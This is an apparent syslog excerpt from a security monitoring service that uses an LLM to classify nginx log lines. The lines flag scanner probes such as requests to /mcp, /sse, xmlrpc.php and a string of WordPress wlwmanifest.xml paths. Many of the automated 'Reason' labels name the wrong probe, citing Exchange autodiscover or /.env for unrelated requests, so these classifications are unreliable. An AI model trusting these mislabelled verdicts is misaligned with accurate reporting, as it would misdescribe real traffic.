Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005200 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx open() failed with a missing file error, which can indicate misconfiguration, missing resources, or probing. Not definitively malicious but warrants review. Line=2026-03-20T07:02:33.272732898Z 2026/03/20 07:02:33 [error] 422#422: *746619 open() "/usr/share/nginx/default/mcp" failed (2: No such file or directory), client: 45.156.129.65, server: _, request: "POS...
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005271 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.272885593Z 45.156.129.65 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "POST /mcp HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196255 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196295 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failed due to missing file for a request to /sse; could indicate misconfiguration or missing resources but not definitive malicious activity. Line=2026-03-20T07:02:33.327988339Z 2026/03/20 07:02:33 [error] 422#422: *746619 open() "/usr/share/nginx/default/sse" failed (2: No such file or directory), client: 45.156.129.65, server: _, request: "GET...
Mar 20 07:02:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:43.196345 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.328076723Z 45.156.129.65 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "GET /sse HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642412 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642454 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 07:02:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:47.642510 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:02:33.526846414Z 45.156.129.67 - - [20/Mar/2026:07:02:33 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6...
Mar 20 07:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:01.941526 [observer] Pipeline: processed=2630 pattern_hits=2573 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:01.941553 [observer] Patterns: hash=2573 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:31.938074 [observer] Pipeline: processed=2632 pattern_hits=2575 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:03:31.938098 [observer] Patterns: hash=2575 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:01.947903 [observer] Pipeline: processed=2636 pattern_hits=2579 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:01.948701 [observer] Patterns: hash=2579 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:31.946153 [observer] Pipeline: processed=2638 pattern_hits=2581 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:04:31.946200 [observer] Patterns: hash=2581 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:01.938734 [observer] Pipeline: processed=2644 pattern_hits=2587 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:01.938757 [observer] Patterns: hash=2587 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:31.933929 [observer] Pipeline: processed=2646 pattern_hits=2589 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:05:31.933953 [observer] Patterns: hash=2589 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:01.955439 [observer] Pipeline: processed=2648 pattern_hits=2591 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:01.955466 [observer] Patterns: hash=2591 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:31.942297 [observer] Pipeline: processed=2652 pattern_hits=2595 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:06:31.942329 [observer] Patterns: hash=2595 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:01.972232 [observer] Pipeline: processed=2654 pattern_hits=2597 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:01.972258 [observer] Patterns: hash=2597 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:31.935317 [observer] Pipeline: processed=2658 pattern_hits=2601 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:07:31.935343 [observer] Patterns: hash=2601 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:01.949221 [observer] Pipeline: processed=2660 pattern_hits=2603 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:01.949255 [observer] Patterns: hash=2603 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:31.933969 [observer] Pipeline: processed=2664 pattern_hits=2607 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:08:31.933991 [observer] Patterns: hash=2607 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:01.959018 [observer] Pipeline: processed=2666 pattern_hits=2609 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:01.959045 [observer] Patterns: hash=2609 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:31.938721 [observer] Pipeline: processed=2668 pattern_hits=2611 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:09:31.938748 [observer] Patterns: hash=2611 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:01.941079 [observer] Pipeline: processed=2674 pattern_hits=2617 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:01.941111 [observer] Patterns: hash=2617 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:31.950105 [observer] Pipeline: processed=2676 pattern_hits=2619 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:10:31.950131 [observer] Patterns: hash=2619 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:01.985655 [observer] Pipeline: processed=2680 pattern_hits=2623 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:01.985843 [observer] Patterns: hash=2623 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:31.946045 [observer] Pipeline: processed=2682 pattern_hits=2625 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:11:31.946081 [observer] Patterns: hash=2625 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:01.938488 [observer] Pipeline: processed=2686 pattern_hits=2629 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:01.938514 [observer] Patterns: hash=2629 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:31.942061 [observer] Pipeline: processed=2688 pattern_hits=2631 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:12:31.942089 [observer] Patterns: hash=2631 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:01.962496 [observer] Pipeline: processed=2690 pattern_hits=2633 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:01.962524 [observer] Patterns: hash=2633 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:31.935314 [observer] Pipeline: processed=2694 pattern_hits=2637 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:13:31.935346 [observer] Patterns: hash=2637 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:01.958652 [observer] Pipeline: processed=2696 pattern_hits=2639 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:01.958690 [observer] Patterns: hash=2639 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:31.935849 [observer] Pipeline: processed=2700 pattern_hits=2643 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:14:31.935880 [observer] Patterns: hash=2643 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:01.946090 [observer] Pipeline: processed=2704 pattern_hits=2647 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:01.946213 [observer] Patterns: hash=2647 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:31.936034 [observer] Pipeline: processed=2708 pattern_hits=2651 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:15:31.936062 [observer] Patterns: hash=2651 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:01.947892 [observer] Pipeline: processed=2710 pattern_hits=2653 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:01.947921 [observer] Patterns: hash=2653 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:31.954237 [observer] Pipeline: processed=2712 pattern_hits=2655 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:16:31.954263 [observer] Patterns: hash=2655 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:01.963937 [observer] Pipeline: processed=2716 pattern_hits=2659 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:01.963963 [observer] Patterns: hash=2659 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:31.948836 [observer] Pipeline: processed=2718 pattern_hits=2661 llm_calls=57 llm_errors=0 learned=0
Mar 20 07:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:31.948861 [observer] Patterns: hash=2661 prefix=0 regex=0 contains=0 deny=9 alert=14 suppress=0 misses=57
Mar 20 07:17:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:45.198545 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T07:17:45.198284581Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726134 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726196 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an HTTP 400 response with an empty/requestless line and placeholder values in the normalized form, indicating a potential anomalous access attempt. Line=2026-03-20T07:17:45.230655202Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "_" "" 400 0 "-" "-" "-"
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726457 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.348072122Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726509 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.399487040Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.435842926Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //xmlrpc.php?rsd HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.472022483Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726817 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.515277488Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726852 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.548006633Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726934 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.580011346Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.726977 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.611959116Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //website/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 1...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727009 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.646186041Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; ...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727150 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.685915307Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727199 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.725096170Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727231 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.764326332Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727264 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.796368110Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727297 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.831204546Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.864220199Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727714 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.897872392Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //media/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10....
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727758 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.934917702Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727792 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.967818010Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727831 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:45.999678593Z 185.193.156.145 - - [20/Mar/2026:07:17:45 +0000] "media.admin.kovicloud.com" "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0;...
Mar 20 07:17:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:49.727864 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T07:17:46.031931926Z 185.193.156.145 - - [20/Mar/2026:07:17:46 +0000] "media.admin.kovicloud.com" "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0...
Mar 20 07:17:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:54.536665 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 07:17:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:17:54.536703 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 07:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:01.950669 [observer] Pipeline: processed=2745 pattern_hits=2686 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:01.950725 [observer] Patterns: hash=2686 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:31.944006 [observer] Pipeline: processed=2747 pattern_hits=2688 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:18:31.944031 [observer] Patterns: hash=2688 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:01.953025 [observer] Pipeline: processed=2751 pattern_hits=2692 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:01.953058 [observer] Patterns: hash=2692 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:31.941498 [observer] Pipeline: processed=2753 pattern_hits=2694 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:19:31.941526 [observer] Patterns: hash=2694 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:01.937361 [observer] Pipeline: processed=2757 pattern_hits=2698 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:01.937388 [observer] Patterns: hash=2698 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:31.936728 [observer] Pipeline: processed=2761 pattern_hits=2702 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:20:31.936754 [observer] Patterns: hash=2702 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:01.952053 [observer] Pipeline: processed=2763 pattern_hits=2704 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:01.952635 [observer] Patterns: hash=2704 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:31.936726 [observer] Pipeline: processed=2767 pattern_hits=2708 llm_calls=59 llm_errors=0 learned=0
Mar 20 07:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:31.936766 [observer] Patterns: hash=2708 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
